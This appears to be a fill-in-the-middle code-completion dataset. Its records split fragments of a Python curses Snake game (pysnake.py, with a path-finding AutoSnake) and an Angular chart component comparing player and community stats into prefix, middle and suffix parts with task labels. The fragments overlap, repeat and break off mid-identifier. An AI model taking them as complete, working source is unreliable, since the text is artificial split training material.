raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
| d = d * r
p += d
res.append(d)
break | conditional_block | |
pysnake.py | = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def wrap_pos(self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
| w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
d = d * | t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue | identifier_body |
pysnake.py | _rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def wrap_pos(self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
d = d * r
p += d
res.append(d)
break
else:
break
res.reverse()
return res or [0]
def route_to(self, target):
parent = {self.pos: None}
def backtrack(p):
res = []
while parent[p]:
d, p = parent[p]
res.append(d)
return res
n = [self.pos]
i = 0
while i < len(n):
p = n[i]
i += 1
v = level.get_tile(p)
if v == target:
return p, backtrack(p)
elif v != Screen.BLANK and p != self.pos:
continue
for dir in (0-1j, -1+0j, 0+1j, 1+0j):
q = level.wrap_pos(p + dir)
if q not in parent:
parent[q] = (dir, p)
n.append(q)
def step(self):
if not self.route_next():
self.reroute()
self.route_next()
super().step()
# width = 160
# height = 90
# width, height = 30, 20
# width, height = 15, 15
# width, height = 160, 90
def food_loop():
return level.food_loop_base(Screen.FOOD, lambda p: p.on_eat_food())
def faster_loop():
return level.food_loop_base(Screen.FASTER, lambda p: p.faster())
def slower_loop():
return level.food_loop_base(Screen.SLOWER, lambda p: p.slower())
# input = LockstepConsumers()
snakes = [
AutoSnake(speed=4, pos=0+10j),
AutoSnake(speed=4, pos=10+12j),
# AutoSnake(speed=4, pos=15+12j),
# AutoSnake(speed=4, pos=0+16j),
]
tasks = [
# input.consume(CursesCharacters(stdscr)),
food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# faster_loop(),
# slower_loop(),
level.play(snakes),
]
# for s in snakes:
# tasks.append(
# s.get_directions(input.consumer()))
try:
msg = str(run_coroutines(tasks))
except GameOver as exn:
msg = exn.args[0]
except KeyboardInterrupt:
raise | msg = 'Thanks for playing!'
| random_line_split | |
pysnake.py | = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def | (self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
d = | wrap_pos | identifier_name |
graph-with-comparison-new.component.ts | static: false }) chart: ElementRef;
lineChartData$: Observable<ChartData<'line'>>;
lineChartOptions$: Observable<ChartOptions>;
communityLabel$: Observable<string>;
yourLabel$: Observable<string>;
@Input() communityTooltip: string;
@Input() yourTooltip: string;
@Input() turnLabel = 'Turn';
@Input() statLabel = 'Stat';
@Input() deltaLabel: string;
@Input() id: string;
@Input() showDeltaWithPrevious: boolean;
@Input() set maxYValue(value: number) {
this.maxYValue$$.next(value);
}
@Input() set stepSize(value: number) {
this.stepSize$$.next(value);
}
@Input() set showYAxis(value: boolean) {
this.showYAxis$$.next(value);
}
@Input() set communityLabel(value: string) {
this.communityLabel$$.next(value);
}
@Input() set yourLabel(value: string) {
this.yourLabel$$.next(value);
}
@Input() set communityValues(value: readonly NumericTurnInfo[]) {
this.communityValues$$.next(value);
}
@Input() set | (value: readonly NumericTurnInfo[]) {
this.yourValues$$.next(value);
}
private maxYValue$$ = new BehaviorSubject<number>(null);
private stepSize$$ = new BehaviorSubject<number>(null);
private showYAxis$$ = new BehaviorSubject<boolean>(true);
private communityLabel$$ = new BehaviorSubject<string>('Community');
private yourLabel$$ = new BehaviorSubject<string>('You');
private communityValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
private yourValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
constructor(
protected readonly store: AppUiStoreFacadeService,
protected readonly cdr: ChangeDetectorRef,
private readonly el: ElementRef,
) {
super(store, cdr);
}
ngAfterContentInit(): void {
this.communityLabel$ = this.communityLabel$$.pipe(this.mapData((info) => info));
this.yourLabel$ = this.yourLabel$$.pipe(this.mapData((info) => info));
this.lineChartData$ = combineLatest([
this.communityLabel$$.asObservable(),
this.yourLabel$$.asObservable(),
this.communityValues$$.asObservable(),
this.yourValues$$.asObservable(),
]).pipe(
this.mapData(([communityLabel, yourLabel, communityValues, yourValues]) => {
// Turn 0 is before any battle, so it's not really interesting for us
const community = this.removeTurnZero(communityValues || []);
const your = this.removeTurnZero(yourValues || []);
const maxTurnFromCommunity = this.getMaxTurn(community);
const maxTurnFromYour = this.getMaxTurn(your);
const lastTurn = Math.max(maxTurnFromCommunity, maxTurnFromYour);
const filledCommunity = this.fillMissingData(community, lastTurn);
const filledYour = this.fillMissingData(your, lastTurn);
// console.debug('chart data', filledCommunity, filledYour, lastTurn, community, your);
const yourData = filledYour?.map((stat) => stat.value) || [];
const communityData = filledCommunity?.map((stat) => stat.value) || [];
// TODO: missing color
const newChartData: ChartData<'line'>['datasets'] = [
{
id: 'your',
data: yourData,
label: yourLabel,
backgroundColor: 'transparent',
borderColor: '#FFB948',
delta: yourData?.length
? [
yourData[0],
...yourData.slice(1).map((n, i) => (yourData[i] == null ? null : n - yourData[i])),
]
: [],
} as any,
{
id: 'community',
data: communityData,
label: communityLabel,
backgroundColor: 'transparent',
borderColor: '#CE73B4',
delta: communityData?.length
? [
communityData[0],
...communityData
.slice(1)
.map((n, i) => (communityData[i] == null ? null : n - communityData[i])),
]
: [],
} as any,
];
const result = {
datasets: newChartData,
labels: [...Array(lastTurn + 1).keys()].filter((turn) => turn > 0).map((turn) => '' + turn),
};
return result;
}),
share(),
takeUntil(this.destroyed$),
);
const maxValue$ = combineLatest([this.maxYValue$$.asObservable(), this.lineChartData$]).pipe(
filter(([maxValue, chartData]) => !!chartData),
this.mapData(([maxYValue, chartData]) => {
const maxValue = Math.max(
...chartData.datasets.map((data) => data.data as number[]).reduce((a, b) => a.concat(b), []),
);
return !!maxYValue ? Math.max(maxYValue, maxValue) : undefined;
}),
);
this.lineChartOptions$ = combineLatest([
maxValue$,
this.stepSize$$.asObservable(),
this.showYAxis$$.asObservable(),
]).pipe(
this.mapData(([maxValue, stepSize, showYAxis]) => this.buildChartOptions(showYAxis, stepSize, maxValue)),
);
}
private removeTurnZero(input: readonly NumericTurnInfo[]): readonly NumericTurnInfo[] {
return input.filter((stat) => stat.turn > 0);
}
private fillMissingData(input: readonly NumericTurnInfo[], lastTurn: number) {
const result = [];
for (let i = 1; i <= lastTurn; i++) {
result.push(
input.find((stat) => stat.turn === i) || {
turn: i,
value: null,
},
);
}
return result;
}
private getMaxTurn(input: readonly NumericTurnInfo[]) {
return input.filter((stat) => stat.value != null).length === 0
? 0
: Math.max(...input.filter((stat) => stat.value != null).map((stat) => stat.turn));
}
private buildChartOptions(showYAxis: boolean, stepSize: number, maxYValue: number): ChartOptions {
const result: ChartOptions = {
responsive: true,
maintainAspectRatio: false,
layout: {
padding: 0,
},
elements: {
point: {
radius: 0,
},
},
plugins: {
datalabels: {
display: false,
},
tooltip: {
enabled: false,
mode: 'index',
intersect: false,
position: 'nearest',
backgroundColor: '#CE73B4',
titleColor: '#40032E',
titleFont: {
family: 'Open Sans',
},
bodyColor: '#40032E',
bodyFont: {
family: 'Open Sans',
},
padding: 5,
caretPadding: 2,
caretSize: 10,
cornerRadius: 0,
displayColors: false,
callbacks: {
beforeBody: (items: TooltipItem<'line'>[]): string | string[] => {
return items?.map(
(item: any) =>
((item?.dataset as any)?.id ?? '') +
'|||' +
(item?.dataset?.label ?? '') +
'|||' +
item?.dataset?.delta[item.dataIndex],
);
},
},
external: (context) => {
const tooltipId = 'chartjs-tooltip-stats-' + this.id;
const chartParent = this.chart.nativeElement.parentNode;
let tooltipEl = document.getElementById(tooltipId);
if (!tooltipEl) {
tooltipEl = document.createElement('div');
tooltipEl.id = tooltipId;
tooltipEl.classList.add('tooltip-container');
tooltipEl.innerHTML = `
<div class="stats-tooltip">
<svg class="tooltip-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 9">
<polygon points="0,0 8,-9 16,0"/>
</svg>
<div class="content"></div>
</div>`;
chartParent.appendChild(tooltipEl);
}
// Hide if no tooltip
const tooltip = context.tooltip;
if (tooltip.opacity === 0) {
tooltipEl.style.opacity = '0';
return;
}
const yourDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 0);
const communityDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 1);
let yourLabel: string = null;
let yourDelta: string = null;
let communityLabel: string = null;
let communityDelta: string = null;
for (const bBody of tooltip.beforeBody) {
const [id, label, delta] = bBody.split('|||');
if (id === 'your') {
yourLabel = label;
| yourValues | identifier_name |
graph-with-comparison-new.component.ts | Size$$ = new BehaviorSubject<number>(null);
private showYAxis$$ = new BehaviorSubject<boolean>(true);
private communityLabel$$ = new BehaviorSubject<string>('Community');
private yourLabel$$ = new BehaviorSubject<string>('You');
private communityValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
private yourValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
constructor(
protected readonly store: AppUiStoreFacadeService,
protected readonly cdr: ChangeDetectorRef,
private readonly el: ElementRef,
) {
super(store, cdr);
}
ngAfterContentInit(): void {
this.communityLabel$ = this.communityLabel$$.pipe(this.mapData((info) => info));
this.yourLabel$ = this.yourLabel$$.pipe(this.mapData((info) => info));
this.lineChartData$ = combineLatest([
this.communityLabel$$.asObservable(),
this.yourLabel$$.asObservable(),
this.communityValues$$.asObservable(),
this.yourValues$$.asObservable(),
]).pipe(
this.mapData(([communityLabel, yourLabel, communityValues, yourValues]) => {
// Turn 0 is before any battle, so it's not really interesting for us
const community = this.removeTurnZero(communityValues || []);
const your = this.removeTurnZero(yourValues || []);
const maxTurnFromCommunity = this.getMaxTurn(community);
const maxTurnFromYour = this.getMaxTurn(your);
const lastTurn = Math.max(maxTurnFromCommunity, maxTurnFromYour);
const filledCommunity = this.fillMissingData(community, lastTurn);
const filledYour = this.fillMissingData(your, lastTurn);
// console.debug('chart data', filledCommunity, filledYour, lastTurn, community, your);
const yourData = filledYour?.map((stat) => stat.value) || [];
const communityData = filledCommunity?.map((stat) => stat.value) || [];
// TODO: missing color
const newChartData: ChartData<'line'>['datasets'] = [
{
id: 'your',
data: yourData,
label: yourLabel,
backgroundColor: 'transparent',
borderColor: '#FFB948',
delta: yourData?.length
? [
yourData[0],
...yourData.slice(1).map((n, i) => (yourData[i] == null ? null : n - yourData[i])),
]
: [],
} as any,
{
id: 'community',
data: communityData,
label: communityLabel,
backgroundColor: 'transparent',
borderColor: '#CE73B4',
delta: communityData?.length
? [
communityData[0],
...communityData
.slice(1)
.map((n, i) => (communityData[i] == null ? null : n - communityData[i])),
]
: [],
} as any,
];
const result = {
datasets: newChartData,
labels: [...Array(lastTurn + 1).keys()].filter((turn) => turn > 0).map((turn) => '' + turn),
};
return result;
}),
share(),
takeUntil(this.destroyed$),
);
const maxValue$ = combineLatest([this.maxYValue$$.asObservable(), this.lineChartData$]).pipe(
filter(([maxValue, chartData]) => !!chartData),
this.mapData(([maxYValue, chartData]) => {
const maxValue = Math.max(
...chartData.datasets.map((data) => data.data as number[]).reduce((a, b) => a.concat(b), []),
);
return !!maxYValue ? Math.max(maxYValue, maxValue) : undefined;
}),
);
this.lineChartOptions$ = combineLatest([
maxValue$,
this.stepSize$$.asObservable(),
this.showYAxis$$.asObservable(),
]).pipe(
this.mapData(([maxValue, stepSize, showYAxis]) => this.buildChartOptions(showYAxis, stepSize, maxValue)),
);
}
private removeTurnZero(input: readonly NumericTurnInfo[]): readonly NumericTurnInfo[] {
return input.filter((stat) => stat.turn > 0);
}
private fillMissingData(input: readonly NumericTurnInfo[], lastTurn: number) {
const result = [];
for (let i = 1; i <= lastTurn; i++) {
result.push(
input.find((stat) => stat.turn === i) || {
turn: i,
value: null,
},
);
}
return result;
}
private getMaxTurn(input: readonly NumericTurnInfo[]) {
return input.filter((stat) => stat.value != null).length === 0
? 0
: Math.max(...input.filter((stat) => stat.value != null).map((stat) => stat.turn));
}
private buildChartOptions(showYAxis: boolean, stepSize: number, maxYValue: number): ChartOptions {
const result: ChartOptions = {
responsive: true,
maintainAspectRatio: false,
layout: {
padding: 0,
},
elements: {
point: {
radius: 0,
},
},
plugins: {
datalabels: {
display: false,
},
tooltip: {
enabled: false,
mode: 'index',
intersect: false,
position: 'nearest',
backgroundColor: '#CE73B4',
titleColor: '#40032E',
titleFont: {
family: 'Open Sans',
},
bodyColor: '#40032E',
bodyFont: {
family: 'Open Sans',
},
padding: 5,
caretPadding: 2,
caretSize: 10,
cornerRadius: 0,
displayColors: false,
callbacks: {
beforeBody: (items: TooltipItem<'line'>[]): string | string[] => {
return items?.map(
(item: any) =>
((item?.dataset as any)?.id ?? '') +
'|||' +
(item?.dataset?.label ?? '') +
'|||' +
item?.dataset?.delta[item.dataIndex],
);
},
},
external: (context) => {
const tooltipId = 'chartjs-tooltip-stats-' + this.id;
const chartParent = this.chart.nativeElement.parentNode;
let tooltipEl = document.getElementById(tooltipId);
if (!tooltipEl) {
tooltipEl = document.createElement('div');
tooltipEl.id = tooltipId;
tooltipEl.classList.add('tooltip-container');
tooltipEl.innerHTML = `
<div class="stats-tooltip">
<svg class="tooltip-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 9">
<polygon points="0,0 8,-9 16,0"/>
</svg>
<div class="content"></div>
</div>`;
chartParent.appendChild(tooltipEl);
}
// Hide if no tooltip
const tooltip = context.tooltip;
